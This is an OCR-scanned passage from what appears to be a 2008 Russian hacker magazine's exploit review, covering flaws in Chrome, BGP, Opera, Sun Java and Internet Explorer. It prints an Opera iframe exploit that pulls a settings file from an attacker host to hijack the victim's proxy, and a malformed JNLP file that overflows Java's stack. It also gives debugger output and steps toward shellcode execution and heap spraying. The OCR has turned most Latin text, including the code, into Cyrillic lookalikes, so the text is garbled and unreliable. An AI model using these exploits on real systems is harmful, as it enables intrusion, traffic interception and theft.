продолжает утверждать, что их 
браузер — более безопасный и 
корректировать содержимое рек- 
ламной странички, по-видимому, 
не собирается. Ладно, это лирика. 
Перейдем к конкретным дырам. 
Функция «ЗаѵеАз» не проверяет 
длинутега «ТіЛе», высаживаясь на 
классическое стековое перепол- 
нение с передачей управления 
на зЬеІІ-код или просто с крахом 
браузера. Обработка ІМС-тегов 
также не свободна отошибок, и 



хотя пока неясно, каким образом 
можно захватитьуправление, 
вызывать отказ в обслуживании 
хакеры уже научились. И это еще 
ничего. СЬготе наступил на те 
же грабли, что и древние версии 
ІЕ, предоставив атакующему 
возможность загружать файлы на 
целевой компьютер без выдачи 
запроса на подтверждение (обыч- 
ная практика — загрузка ярлыков 
на рабочий стол с одновременной 
заливкой зловредной программы, 
на которую, собственно говоря, и 
указываетярлык]. Рано или поздно 
по нему кто-нибудь да щелкнет, 
а если пользователь настолько 
продвинут, что тут же удал ит левый 
ярлык, то хакер может использо- 
вать переполнение буфера в ЦІ Р И, 
НРЕЕ или одну из других дыр, 
полный список которых занимает 
добрый талмуд. Интересующихся 
техническими подробностями мы 
отправляем кследующим ссылкам: 
ѵѵѵѵѵѵ.5есигіМоси5.сот/ЬісІ/31029 . 
\л/ѵѵѵѵ.5есигіМоси5.сот/ЬісІ/30975 . 
ѵѵѵѵѵѵ.зесигіЫосиз.сопп/ЫсІ/ЗІ 038 . 



»ТагдеІ5| 



Разные дыры затрагивают раз- 
ные версии браузера (появляются 



► 050 



ХАКЕР 10 /118/ 08 







взлом 



» 




Чуваки откопали дыру десятилетней давности и страшно этому обрадо- 
вались, поспешив обрадовать всех остальных 



чуть ли не каждый божий день]. 
Основной косякуязвимостей 
сидит в боодіе С Его те 0.2.149 
27. Более поздние версии менее 
уязвимы. 



» Ехріот 



Боевой ехріоіі, эксплуатирующий 
дыру в ЗаѵеАз, лежит на тіІѵѵОгт. 
сот/зрІоіІз/ 2008 -сІ")готе.Іа 2 . а 
рядышком с ним — ехріоіі для ав- 
томатической загрузки файлов на 
целевую машину: ѵѵѵѵѵѵ. тіІѵѵОгт . 
сот/ехрІоіІз/6355 . 



»5оІи1іоп 



Несмотря на то, что Ооодіе 
довольно оперативно затыкает 
дыры, выпуская новые версии, 
пользоваться ими категорически 
не рекомендуется. Ну разве что 
в ознакомительных целях на 
виртуальной машине, на которой 
нет ничего ценного, что было бы 
жалко потерять. 



^ Л ВОССТАВ- 
ШИЕ 

ИЗ МЕРТВЫХ 

АТАКИ НА В6Р- 
ПРОТОКОЛ 



» Вгіе{ 



Мы уже рассказывали отом, как 
Дэн Каминский лихо «переоткрыл» 
три дыры десятилетней давности 
в БЫЗ, приковав внимание прессы 
и производителей самих БЫ5. 
Пример оказался заразительным 
(действительно, зачем искать 
новыедыры, когда можно кричать 
о хорошо забытых старых?]. На 
последнем ОеІСоп’еТони Капела 
(Топу Кареіа, компания 5І\Ііпез 
Оаіа) на парусАлексом Пилосовым 
(Аіех Рііозоѵ, компания Рііозоіі], 
шокировали общественность, про- 
демонстрировавтехнику перехвата 



Іпіегпеі-трафика путем атаки на 
В6Р-протокол, незащищенность 
которого позволяет человеку, си- 
дящему, скажем, в юрте на Чукотке, 
перехватывать трафик между 
Бостоном и Сан-Франциско ( Ыод. 
ѵѵігесІ.сот/27Ь5Ігоке6ЛіІе5/есІіІесІ- 
ірНісІ-2. ррі: ]. Реализация атаки 
тривиальна, а защититься отнее... 
ну, нето, чтобы совсем невозможно, 
но очень и очень сложно. Вектор 
направлен отнюдь не на конечных 
пользователей, а на крупных (и 
мелких] І5Р, передающихтрафик, 
среди которых есть и такие, что 
плюют на безопасность. Причем, 
плюют в планетарных масштабах. 
Яркий примертому— нашумевший 
скандал с Пакистанским провайде- 
ром Ракізіап Теіесот, который под 
давлением правительства попы- 
тался запретить своим гражданам 
втыкать в ѴоиТиЬе и «слегка» заха- 
чил ВСР-таблицы маршрутизации. 
В результате чего без ѴоиТиЬ’а 
остались миллионы пользователей, 
находящихся вне Пакистана. Все 
очень просто — захаченные 
таблицы маршрутизации сде- 
лали Ракізіап Теіесот самым 
привлекательным роутером для 
передачи трафика. И ѴоиТиЬе, и 
Ракізіап Теіесот превратились 
в черную дыру, стягивающую 
трафиксо всего мира ( пе' 
со.ик/1 /ЫДесМпоІодѵ/7262071 . 
зіт . ѵѵѵѵѵѵ.гіре.пеі/пеѵѵз/зіисіѵ- 
ѵоиІиЬе-Ыіаскіпа.ЫтІ] . 
Действительно, тут есть от чего 
выпасть в осадок, сесть на 
измену и нереально испугать- 
ся. Но впервые об этой дыре 
открыто заговорили в далеком 
1 998 году ( ѵѵѵѵѵѵ.сз.соІитЬіа. 
ебиЛ-зтЬ/рарегг/асзас-ірехІ. 
рсііі Стех пор прошел добрый 
десятоклети... ничегоІЖивем! 
«Изюминка»Тони и Алекса 



состояла в том, что они предложи- 
ли не просто направлять трафикв 
устройство/беѵ/пиі, какэто делал 
Ракізіап Теіесот, а возвращать 
его (возможно, в слегка моди- 
фицированном виде] конечному 
пользователю, открывая огром- 
ные перспективы для шпионажа. 

Во всяком случае, на бумаге. А в 
реальнойжизни? Начнем стого, 
что ІР- прото кол поддерживает 
маршрутизациютолько вумах 
студентов первого курса. На самом 
деле, маршрутизацией (то есть, 
поиском оптимальной траектории 
пересылки пакетов междуузлами и 
предотвращением закольцовыва- 
ния] занимается толпа вспомога- 
тельных протоколов. Большинство 
из них работают нижеТСР/ІР (и 
потому совершен но «прозрачны» 
и недоступны для атаки]. Однако, 
протокол ВОР (ВогбегОаІеѵѵау 
Ргоіосоі, «Протокол Граничного 
Шлюза»] работает поверх ІР (в 
частности, ВОР оѵегТСР использу- 
ет порт 179], а потому доступен для 
атаки из любой точки Сети. Роутеры 
содержат та блицы маршрутизации, 
при ни мающие да иные от других 
роутеров без всякой авторизации! 
Любой узел может объявить себя 
роутером, сообщающим всем 
остальным о себе и отехузлах, 
которым он готов доставитьтрафик. 
Причем, если целевому узлу берут- 
ся доставитьтрафик более одного 
роутера, то выбирается роутер, 
обслуживающий более узкий 
диапазон адресов. Чтооченьхорошо 
для атакующих — представиться 
маленьким роутером проще, чем 
большим и могучим. Однако пред- 
ставиться роутером все равно нетак 



просто! Придется либо регистриро- 
ваться в ІпІегпеіАззідпесІ ІЧитЬегз 
Аиібогііу (ІАІЧА), либо заниматься 
подменой ІР-адресов, либо искать 
роутеры, принимающие ВОР-пакеты 
от кого угодно. А потому, осуществить 
та кую ата ку м ожет тол ькосравни- 
тельно крупный І5Р (типа Ракізіап 
Теіесот], но никакие Вася Пупкин. 

ДЯВНЯ 

ѴѴогІб ѵѵібе 



» Ехріот 



Н е тр е бу етс я , д о стато ч н о у ста н о - 
вить ВЗБ (она поддерживает ВОР] 
и настроить ее в режиме роутера. 



»5оІи(іоп 



Провайдерам: установить фильтр 
ВОР-пакетов и резать всех, кто не 
входит в заранее сформированный 
списокдоверенныхузлов. 




ОРЕКА 

МНОЖЕС- 

ТВЕННЫЕ 



ОШИБКИ 



>> Вгіе{ 



Орега по праву считается самым 
защищенным браузером, прак- 
тически свободным отошибок. 

Но отсутствие ошибок — вовсе 
не следствие качества кода, а, 
главным образом, недостаток 
внимания. Опера достаточно по- 
пулярна в Европе, но практически 
неизвестна на Западе, а потому 
хакеры долгое время обходили 
ее стороной. Естественно, такой 
стихийный «мораторий» не мог 
продолжаться бесконечно, и 
новый релиз Орег’ы 9.52 исправ- 
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ляет сразу семь ошибок, среди которых есть и отказ в обслуживании, и 
фишинг, и кросс-скриптинг, и, в общем, много чего. Полный перечень 
ошибоксодержится на официальном сайте [ ѵѵѵѵѵѵ.орега.сопп/сіосз/ 
сЬапае[оазАл/тс 1 оуу 5 / 952 ]. так что не будем повторяться. Наибольший 
интерес (и на и высшую опасность] представляет ошибка обработки 
протоколов, позволяющая вызывать Оперу, передав ей в команд- 
ной строке любой файл — например, файл настроек самой Оперы, 
загружаемый судаленного хакерского узла. Как нетрудно сообразить, 
в файле настроек прописано буквально все и вся. В частности, там 
можно найти адрес ргоху-сервера. Хорошая идея — навязать жертве 
свой собственный Ргоху, перехватывая трафик и модифицируя его 
по своему усмотрению (внедряя троянов в скачиваемые жертвой 
исполняемые файлы и т.д.]. Технические подробности можно найти 
на блоге первооткрывателя, пожелавшего остаться неизвестным и 
скрывающегося за псевдонимом В і Ну (В К) Віоз — хз-зпірег.сот/ 

Т Ыоа/ 2008 / 08 / 22 /орега- 5 І;и 1 : 1 : - 1 : оиоѵѵир . 



»ТагдеІ5| 



Орега 9.51 и более младшие версии. 



» ЕхрІоіі| 



° Исходный текст ехрІоіТа состоит из одной строки, приведенной ниже. 
Ата кующему достаточно всего лишь внедрить ее в НТМІ_-страничку и 
заманить туда доверчивого пользователя. 

<ібгаше зге = 1 орега .ргоСосоІ :ѵты. СезС . сот" / 
зеССіпдз " //аССаскег-ір/іпі-ТіІе . іпі '> 



»5оІи1іоп 



Обновиться до версии 9.52 — ЬіТрФ/ѵѵѵѵѵѵ.орега.соіті/ргосІисІъ/сІезкІор . 



СТАРЫЕ АТАКИ НА НОВЫЙ ЛАД 



» Вгіел 



1 7 августа 2008 года, в 7 часов 1 6 минут по Стандартному Тихооке- 
анскому Времени я получил от Криса Вебера (СЬгіз ѴѴеЬег, СазаЬа 
ЗесигНу] письмо, в котором тот сообщил о найденной дыре в Зип 
Оаѵа 14.3 бог ѴѴіпсІоѵѵз. Обнаружена она была в ходе фуззинга Джавы, 
завершившегося переполнением стека с отказом в обслуживании. 
Конечно, это очень интересно, но передача управления на збеіі-код 
намного круче! Вот только как ее осуществить? С позиции класси- 
ческой теории переполнения буферов — никак! Короче, совместными 
усилиями мы быстро нашли ответ, попутно усовершенствовав технику 
атаки под кодовым называнием «зіаск сгоззоѵег» и обнаружив в ядре 
ѴѴіпсІоѵѵз кучу сюрпризов, о которых я до этого даже и не подозревал. В 
момент, когда пишутся эти строки, с дыры еще не снят гриф секрет- 
ности. Аіісе СЬапд из Епбеаѵог ЗесигНу разрабатывает сигнатуры для 
распознавания и блокировки атак, а сам я работаю над докладом для 
конференции МісгозоК ВІиеНа* ЗесигНу ВгіеЛпдз: Раіі 2008 ( 
т і егозой. сот/еп-из/ 5 есигПу/сс 748656 .а 5 рх ]. объясняя Империи Зла 
насколько онанеп ра ва. Те мв ре менемЗипеще пребывает в неведе- 
нии относительно небезопасности своей виртуальной машины, так 
что читатели «Пакера» получают в свои лапы вполне эксклюзивный 
материал, правда, к моменту выхода журнала из печати, это будетуже 
не новость. 



»Тагдеі| 



Огромное количество приложений! Зип Заѵа 14.3 — лишьодно из многих. 



» Ехріоід 



Исходный текст ехрІоН’а, разработанного Крисом Вебером, приведен 
дальше: 



Сайтфирмы СазаЬа ЗесигНу, где работает Крис Вебер, обнаруживший дыру вЖабе 




► 052 
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СуЬегРоѵѵег 



ЕХРЮІТ, ВЫЗЫВАЮЩИЙ ПЕРЕПОЛНЕНИЕ СТЕКА В 51^ МѴА 14.3, 
РАЗРАБОТАННЫЙ КРИСОМ ВЕБЕРОМ 

<?хш1 ѵегзіоп= " 1 . О " епсос!іпд= "иББ-8 " ?> 

<! — ЛШР Рііе Бог Риггіпд --> 

<іп1р 
зрес = " " 
сос!еЪазе= " " 
кгеБ = " " > 

<гезошгсез> 

<3 2зе ѵегзіоп= " " Ь.геБ=""/> 

<ргорегБу паше= " " ѵа1ие= " " /> 

<^аг Ъ.геБ = " " с!оѵт1оас1= " " /> 

спаБіѵеІіЪ ЬгеР= " &&&&&&&&&&&&&&&&&&&...АААААААААААА" 
сІоѵтІоасН " " /> 

</гезоигсез> 

</ЗПІр> 



>>5оІиІіоп 



Необходим тщательный аудит и существенный редизайн всех существу- 
ющих приложений. Даже тех, которые не обращаются в Сеть, поскольку 
атаки этого типа способны воздействовать на соседние (уязвимые] 
приложения через неуязвимые, имеющие доступ кСети. Короче говоря, 
все мы сидим на пороховой бочке. 



» Риіісіізсіозе 



Берем Жабу (фу-ты, какая гадость!]. Аккуратно так, значит, мы ее берем 
и передаем ей вышеуказанный ехріоіі в качестве аргумента командной 
строки. Жаба тут же с грохотом рушится. С грохотом — потому что у меня на 
критические ошибки повешен звук разбивающегося стекла. В другом слу- 
чае грохота может и не быть. Суть в том, что ехріоіі рвет Жабу, как мыльный 
пузырь. Что не покажется удивительным, если заглянуть в машинный код. 
Ты увидишь, что Жаба в попытке разрешения символа «&» вызывает пар- 
сер в рекурсивном порядке. А поскольку символов «&» в коде ехріоіба, как 
детей у матери-героини (и даже больше], — стековая память заканчивается 
прежде, чем Жабе удается распарсить строку ЬгеІ до конца. 

Уж сколько раз твердили миру, что рекурсия — большое злоибез 
особой нужды ей лучше не злоупотреблять. Рекурсия без контроля 
глубины вложения и обработки исключений — тройное зло, при- 
водящее к отказу в обслуживании, сопровождающемуся сбросом 
дампа памяти (если, конечно, Доктор Ватсон настроен должным 
образом — конфигурация по умолчанию нас вполне устроит, так что 
будем «плясать» от нее]. 

Полученный дамп следует загрузить в МісгозоИ ОеЬиддег, входящий 
в состав ІЧТООК и МВОеЬиддіпдТооІз (последний занимает порядка 
десяти метров и распространяется бесплатно]. Утилита сбЬ.ехе 
представляет собой консольную репрезентацию отладчика. Ключ -г 
указывает, что следующий за ним файл является дампом памяти: 



ПЕРВИЧНЫЙ АНАЛИЗ ДАМПА ПАМЯТИ, 

СБРОШЕННОГО ЖАБОЙ СРАЗУЖЕ ПОСЛЕ СМЕРТИ 

$сс1Ъ.ехе -2 заѵатоз.сітр 

МісгозоББ (К) ЭДіпсІош БеЪиддег Ѵегзіоп 6 . 3 . ООП . 2 
СоругідкБ (с) МісгозоББ СогрогаБіоп. АН гідкБз 
гезегѵесі. 

Боасііпд Битр Рііе [Б : \д аѵамз . сЗтр] 

Бзег Міпі Битр Рііе: Опіу гедізБегз, зБаск апсі рогБіопз 
о Б тетогу аге аѵаіІаЫе 

ОДіпскжз ХР Ѵегзіоп 2600 (Зегѵісе Раск 3) МР (2 ргосз) 

Ргее х86 сотраБіЫе 
РгосІисБ : ШіпББ , зиіБе: ЗіпдІеБзегТЗ 
БеЬид зеззіоп Біте: Тки Зер 04 02:41:33 2008 
ЗузБет БрБіте : поБ аѵаіІаЫе 
Ргосезз БрБіше: 0 сіауз 0:00:56.000 
ЗутЬоІ зеагск раБк із: *** ІпѵаІісЗ *** 
****************************************************** 
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* ЗутЬоІ 1оа<5іпд тау Ье ипгеІіаЫе міккоик а зутЬоІ 

зеагск ракЬ. * 

* ІІзе . зуткіх ко Ьаѵе кЬе сІеЬиддег сЬоозе а зутЬоІ ракЬ. 

* 




* Аккег зеккіпд уоиг зутЬоІ ракЬ, изе . геІоаЬ. Ро геРгезЪ. 
зутЬоІ ІосаРіопз. * 

****************************************************** 
ЕхесиРаЫе зеагск ракЬ із : 



(2<58.6с1с): Зкаск оѵегРІоѵ^ — со<5е с00000к<5 (!!! зесоп<5 
сЬапсе ! ! ! ) 

еах=419еа938 еЬх=00000000 есх=2ба73248 е<5х=00000000 
езі = 00000001 ес!і = 26а73248 

еір=009аа2Ь0 езр=0342 5к<5с еЬр=03426018 іор1=0 пѵ 

ир еі пд пт па ре су 

сз = 001Ь зз = 0023 с!з = 0023 ез = 0023 Рз = 003Ь дз = 0000 
еР1 = 000102 83 

009аа2Ь0 89842400с10кккк тоѵ [езр-0х3000] , еах зз:002 
3 : 03422 к<5с = ???????? 



03426358 
03426428 
034264Р8 
0342 65с8 
03426698 
03426768 
03426838 
03426908 
0342 69(38 
0342 6 аа8 
0342 6Ь7 8 
0342 6с48 
0342 6(518 
0342 6<5е8 
0342 6еЬ8 
03426Р88 



009с9398 

009с9398 

009с9398 

009с9398 

009с9398 

009с9398 

009с9398 

009с9398 

009с9398 

009с9398 

009с9398 

009с9398 

009с9398 

009с9398 

009с9398 

009с9398 



0х9с9398 

0х9с9398 

0х9с9398 

0х9с9398 

0х9с9398 

0х9с9398 

0х9с9398 

0х9с9398 

0х9с9398 

0х9с9398 

0х9с9398 

0х9с9398 

0х9с9398 

0х9с9398 

0х9с9398 

0х9с9398 



Как мы видим, это действительно переполнение стека (в смысле, 
исчерпание стековой памяти], на что указывает код исключения 
СОООООЕВЬ. А что означают слова «!!! зесоп5 сЬапсе !!!»? Как мы 
уже писали в 14-м выпуске ехрІоК оѵегѵіеѵѵ, исключение СОООООЕОЬ 
генерируется системой задолго до исчерпания стековой памяти, 
когда остается еще целых три страницы. Две из которых выделяют- 
ся под нужды обработчика исключения, а последняя (с атрибутами 
РАОЕ_Ж)АССЕ5 8 ] используется в качестве защитного барьера, чтобы 
остановить рост стека и предотвратить его вторжение в стековое про- 
странство постороннего потока или в кучу. В общем, в область памяти, 
находящуюся за границами стека. 

Команда «к» предписывает отладчику отобразить состояние стека на 
момент выброса исключения. Посмотрим, что там у нас. 

СОСТОЯНИЕ СТЕКА НАМОМЕНТВЫБРОСАИСКЛЮЧЕНИЯ 

0 : 0 1 4 > к 

*** Ѵ1АКШЫС: ШаЫе ко ѵегіку кітезкатр ког пк<511.<511 
*** ЕКК.ОК: Мо<5и1е 1оа<5 сотр1еке<3 Ьик зутЬоІз сои1(5 пок Ье 
1оа<5е<5 ког пкЫІ.ЫІ 
СЬіІЬЕВР ЕекА<5(5г 

Ѵ/АКІ5ІЕС: Ргате ІР пок іп апу кпоѵ/п то<5и1е. Еоііоѵ^іпд 
кгатез тау Ье шгопд. 

03426018 009с935с 0х9аа2Ь0 
034260е8 009с9398 0х9с935с 
0342 61Ь8 009с9398 0х9с9398 



Ага, адрес возврата всюду (за исключением самой верхней строки] ука- 
зываема одну итуже функцию, вызываемую рекурсивно. Собственно 
говоря, это нам и требовалось доказать. Делоза малым — разобраться, 
каким образом мы можем передать управление на збеіі-код. В обыч- 
ныхусловияхтакое действительно невозможно: стековое исключение 
генерируется, когда у системы в запасе имеется целыхтри страницы, а 
каждая страница — это целых 4 Кб. Даже если за концом стека потока А 
находится стек потока Б (как чаще всего и бывает] и на дне стека потока 
Б лежит указатель на 5ЕН -обработчик (а он там лежит], — в нормальных 
программахдо него никакой рекурсивной функции не дотянуться! 

Но нам везет. И не просто везет, а фантастически! Согласно показаниям 
отладчика, исключение вызывается машинной инструкций тоѵ [езр- 
0x3000], еах, записывающей содержимое ЕАХ по смещению 0x3000 выше 
текущей позиции указателя вершины стека. Что в точности равнотрем 
страницам. Конечно, трех страницнам мало. Нам нужнотри страницы 
и еще чуть-чуть, чтобы дотянуться до указателя на 5ЕН. И это можно 
обеспечить! Достаточно подобрать длину «&&&» с последующими 
за ними символами «ААА»так, чтобы стековый кадр открывался по 
заданному смещению относительно нижней сторожевой страницы. Как 
именно это сделать — уже описывалось в прошлой статье. 

Остается выяснить, что именнотуда записывается. Как нетрудно уви- 
деть, старший байт регистра ЕАХ равен 'А 1 (символу, содержащемуся 
в строке, вызывающей переполнение). Младшие байты смотрят в стек, 
вершина которого расположена где-то в районе ОЗххххххЬ. То есть, для 
достижения задуманного необходимо заменить А’ на символ с кодом ОЗЬ 
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Раскладка стекового пространства 



— и тогда Жаба окажется под нашей властью. На этом можно было бы 
и закончить, если бы не одно «но». При попытке практической реали- 
зации готового ехрІоіГа мы с Крисом Вебером обнаружили одну очень 
интересную деталь. 

Значение регистра ЕЗР в момент краха (согласно показаниям отлад- 
чика] равно 0342 5РОСІ1, а размер стека поумолчанию составляет 
1 Мб. Значит, у нас есть все основания ожидать, что вершина стека 
находится науровне 034200001т, — оченьдалеко от наблюдаемых нами 
03425РВСИ. У нас в запасе имеется чертова уйма стековой памяти, а 
операционная система необъяснимым образом генерируетисключение, 
сигнализируя об исчерпании стека. Очень странно. Глюк? Или фича? 
Отказывается, все-таки фича, даже документированная. Разведка 
доложила — ситуация детально описана в М50ІМ на странице тзбп. 
тісго5011сот/еп-и5/[іЬгагѵ/сс267849.а5рх . где развернуто объясняется, 
что данное исключение может генерироваться втрех ситуациях: 

•а) когда стековой памяти действительно нет (в смысле, осталось всего 
три страницы); 

б) когда полностью исчерпана виртуальная память и система не может 
выделить ни странички; 

в) когда система начинаетувеличивать файл подкачки. 

В принципе, все логично. Если приложение запрашивает еще одну стра- 
ницу стековой памяти, а памяти (общесистемной, а не стековой] у нас нет, 
то исключение представляется вполне разумной реакцией оси. Проблема 
втом, что поумолчанию система создает файл подкачки не очень большого 
размера (чтобы не отъедать дисковое пространство без надобности]. А 
когда общесистемная виртуальная память (в которую входит нетолько стек, 
но и куча] близится кисчерпанию, система приступаеткувеличениюфайла 
подкачки. На это требуется время (особенно на сильно фрагментирован- 
ных дисках], и если оставшийся резерв памяти будет исчерпан прежде, 
чем система покончите файлом подкачки, все последующие запросы на 
выделение памяти будут отклонены. Функция ѵігСиаІАІІос в этом 
случае просто вернет ноль, сигнализируя об ошибке — но вот попытка 
выделения новых стековых страниц породит неожиданное исключение, 
которое практически никто из программистов не обрабатывает! 
Допустим, мы запускаем на целевом компьютере ЗаѵаЗсгірІ;, потребляющий 
огромное количество памяти. Тогда, если начальный размер файла подкачки 
меньше максимально допустимого (поумолчаниютаконо и есть], один за дру- 
гим начнут рушиться посторонние приложения, нуждающиеся в стеке, втом 
числе и системные! Хотя передать управление на збеіі-код таким способом 
невозможно, тотальный отказ в обслуживании вызывается без проблем! 
Резюмируя вышесказанное — дыру вЖабе можно эксплуатировать 
только на системах с достаточным количеством виртуальной памяти или 
с уже увеличенным файлом подкачки. В противном случае, дело ограни- 
чится простым крахом, ц-ц 




АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 
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КРИС КАСПЕРСКИ I 






ОСЕННИЙ СБОР 1 
ДЫР В ІЕ 



НЕИНИЦИАЛИЗИРОВАННЫЕУКАЗАТЕЛИ ПОД ПРИЦЕЛОМ 



Сегодня мы поговорим о сравнительно новом и малоизвестном семействе 




хакерских атак, направленны х на неинициализированные указатели. 

В качестве подопытной лабораторной крысы будем использовать свежие 
дыры в ІЕ, допускающие удаленный захват управления с передачей управле- 
ния на зйеіі-код. Обсудим и перспективы атак на другие приложения. 



дея использовать неинициализированные переменные для 
локальных/удаленныхатакпришла вхакерские головы еще 
лет десять тому назад. Однако, ни одного работоспособного 
ехрІоіЕа за минувшее время не появилось. Почему? В отли- 
чие от переполняющихся буферов (легко обнаруживаемых іинег'а ми], 
поиск неинициализированныхуказателей требует кропотливого ручного 
анализа кода и творческого вдохновения. Без него разобраться в веко- 
вых наслоениях пластов различных модулей (по которым можно изучать 
хронологию развития Си++] нетак-то просто, если вообще возможно. 
Хуже того — подавляющее большинство найденных дыр этого типа не 
представляют никакой хакерской ценности. Помимо наличия одной или 
нескольких неинициализированных переменных нам необходимы еще и 
методы локального/удаленного воздействия на их содержимое, а также 
нужно выработать определенный сценарий атаки, заканчивающейся 
захватом управления или, на худой конец, крахом приложения. Но — увы! 
Подобные подарки судьбы встречаются крайне редко. Чаще всего, не- 
инициализированные переменные приводят к некорректному поведе- 
нию жертвы, да ито — при сочетании кучи маловероятных обстоятельств. 
Какое-то время хакеры носились с этой идей, писали статьи в электрон- 
ныежурналы с полными математическими выкладками, теоретически 
обосновывающими возможность атаки на неинициализированные 
переменные. При этом сами атаки носили единичный характер, не 
выходящий за рамки лабораторныхэкспериментов. Тем временем, пока 
МісгозоЙ (и другие производители] лихорадочнозатыкали одни дыры, 
хакеры открывали другие, прорывая тоннели и заходя на посадочную 
полосу с совершенно невероятных позиций, граничащих со срывом в 
плоский штопор. Но срыва не было. Вместо штопора управление получал 



диверсионно-разведывательный код, открывающий удаленный зЬеІІ 
Как известно, прочность цепи определяется ее слабейшим звеном. Вот 
точнотак и с безопасностью компьютерных систем! 

МісгозоЙ подогнала серию заплаток в ІЕ, связанных с неинициализиро- 
ванными указателями и проходящих под статусом критических (означает 
возможность удаленного захвата управления машиной]. 

Сами заплатки (вместе со скупой технической информацией] содержатся 
в августовском бюллетене безопасности М508-45, выпущенном в свет 1 2 
числа ( іглсгозоІ1сотЛесЬпеі/5есигіІѵ/ВиІ.І.еІ:іп/М508-045.пп5рх ]. Однако, 
поскольку в ІЕ оказалось гораздо больше неинициализированныхука- 
зателей, первый блин вышел комом, — не прошло и девяти дней, как М5 
выпустила исправленный набор заплаток, расположенный потомуже 
самому адресу. Заплатки латаютзаплатки! В результате, мы имеем целых 
пять официально признанных ошибок: 

• НТМЬ ОЬзесСз Метогу СоггирЬіоп ѴиІпегаЬіІіСу — СѴЕ- 
2008-2254; 

• НТМЬ ОЬ^есСз Метогу СоггирЬіоп ѴиІпегаЬіІіРу — СѴЕ- 
2008-2255; 

• ІІпіпіЦіаІігесі Метогу СоггирЬіоп ѴиІпегаЬіІіЬу — СѴЕ- 
2008-2256; 

• НТМЬ ОЬфесЬз Метогу СоггирЬіоп ѴиІпегаЬіІіЬу — СѴЕ- 
2008-2257 и СѴЕ-2 008-2258 ; 

Попробуем разобраться, почему возникаютнеинициализированные 
переменные в современных программах и каких можно использовать в 
своих целях. 
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Осенние ошибки в I Е, связанные с доступом к неинициализированным 
указателям 




Н НЕДОСТРОЕННЫЕ ОБЪЕКТЫ НА КУЧЕ 

Я не устаю твердить, что плюсову Си++ только два, а вотминусов... На- 
много больше! И вообще, объективно-ориентированный подход создает 
куда больше проблем, нежели их решает. Для борьбы с проблемами, 
порождаемыми парадигмами ООП, создаются сложные и громоздкие 
механизмы, пользоваться которыми не рекомендуют даже умудренные 
жизнью гуру. 

Взять хотя бы два фундаментальных понятия: конструкторы и исключе- 
ния. Конструктор может выбрасывать исключение. При этом, как прави- 
ло, деструктор не вызывается и освобождается лишь память, выделенная 
под сам объект, но объекты, которые конструктор уже успел создать, 
остаются (в общем случае] не уничтоженными. Их поведение зависит 
от природы самих объектов. Для некоторых объектов (подчиняющихся 
парадигмам ООП) автоматически вызывается деструктор, удаляющий 
их по всем правилам, но вот открытые файлы, установленные сетевые 
соединения и еще куча всякого барахла, продолжают болтаться в памяти, 
если только обработчик исключения не позаботится об их освобождении. 
Коварство Си++ втом, что для временных объектов (создаваемых компи- 
лятором, например, во время передачи аргументов] транслятор может 
выполнять раскрутку стека (зіаск ипѵѵіпб], удаляя недостроенные объекты 
оператором сіеіеіе. В результате, при возникновении исключения в конс- 
трукторе вызов деструктора все же происходит, но... никаких гарантий на 
этот счету нас нет. Тутвсеоттипа объекта, особенностей транслятора и 
ключей компиляции зависит! 

Вообще, обработка ошибок в конструкторе — настоящая головная боль. 
Потому программисты оченьчасто прибегаюткразнообразным хакам. 
Самый популярный — забить на конструктор и выполнять инициализа- 
цию объекта в отдельном методе (или даже нескольких методах], условно 
— іпіс ( ) . Подобный подход нещадно эксплуатируется разработчиками 
библиотеки МРС, да и в других проектах — не редкость. 

Не будем спорить, что хорошо, а что плохо (хватит разводить теоретичес- 
кий флейм, разработчики МРС недураки и, уж тем более, не пионеры). 
Методы-инициализаторы были, есть и будут — это факт, от которого не 
уйти (миллионы строккода не переписать за один день]. И этот факт 
приводит к возможности появления недостроенных объектов. Действи- 
тельно, объект создали, а вызвать метод-инициализатор забыли. Как 
следствие, в переменных-членах объекта — мусор. Использование недо- 
строенного объекта приводит к непредсказуемому поведению последне- 
го. Чуть позже мы покажем, как можно использовать ошибки этого типа 
для направленной атаки, а пока обратим внимание на вторую причину 
возникновения неинициализированных переменных. 

Для программ, написанных на смеси чистого и приплюснутого Си, 
характерна попытка имитации (а, точнее, «эмуляции»] некоторых Си++ 




Передача управления на збеіі-код путем выделения блоков из кучи и 
заполнения ихуказателями на збеіі-код (с последующим возвращением 
их в пул свободной динамической памяти] 



фич из Си кода. Втом числе, виртуальных функций, которые и в самом 
Си++ реализованы нелучшим образом, ауж их ручная имплементация 
и вовсе становится источником ошибок. Испортить та кую красивую 
идею!!! Создаем структуру (собственно говоря, приплюснутые классы 
являются типичными сишными структурами, только в Си++ все члены по 
умолчанию приватные, еслитолько не оговорено обратное]. Помещаем в 
структуру один или несколько указателей на функции, которые могут быть 
переопределены в любой момент. Оченьудобно! Скажем, нужно нам в од- 
ном месте заменить системный обработчик правого клика мыши на наш 
собственный для вывода пользовательского меню или перехватывать 
вывод документа на печать... да все что угодно! 

Итутмы плавно переходим кобъектам с программируемыми свойс- 
твами (или, говоря английским языком, ргорегбез). Вместо того, чтобы 
перечислять в методе-инициализаторе все свойства (большинство из 
которых остается в состоянии по умолчанию], архитектор проекта пишет 
объект, поддерживающий по одному методу-инициализатору на каждое 
свойство. Весьма популярный подход, обязанный своим рождением еще 
одному косяку в приплюснутом си, который формально поддерживает 
функции с аргументами поумолчанию, но не позволяет нам менятьсосто- 
яние произвольныхаргументов, что на 99% обесценивает идею. 

Анализ показывает, что ІЕ написан на смеси классического и приплюс- 
нутого си, а также использует большое количество методов-инициали- 
заторов, вызываемых вручную. То есть, существует возможность вызова 
недостроенного объекта с неинициированными переменными. Несмотря 
нато, что большинство объектов написано вполне корректно и отказыва- 
ются работать без предварительной инициализации, честно возвращая 
ошибку, — без ляпов не обошлось! Ряд объектов содержат в своем чреве 
указатели на другие объекты, инициализируемые не конструктором (вы- 
зываемом автоматически], а отдельными методами-инициализаторами, 
вызываемыми вручную или... вообще никем не вызываемыми. В итоге, 
при использовании недостроенного объекта происходитобращение к 
неинициализированномууказателю, содержащему всякий мусор, — и 
приложение кончаетисключением. 

Атеперьсамое главное! Огромное количество ІЕ-объектов (втом числе и 
уязвимых) доступны из скриптовых языков (типа ^ѵаЗсгірІ или ѴВБсгірі], 
что делает возможным направленную атаку на неинициализированные 
переменные, поскольку объекты физически размещаются в динамичес- 
кой области памяти, используя единый менеджер кучи. Другими словами, 
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скрипт может выделить блок памяти, записать туда все, что угодно, 
освободить его, и... при последующихзапросах памяти на размещение 
очередного создаваемого объекта с некоторой степенью вероятности 
будет использован именно наш блок. Какова степень этой вероятности 
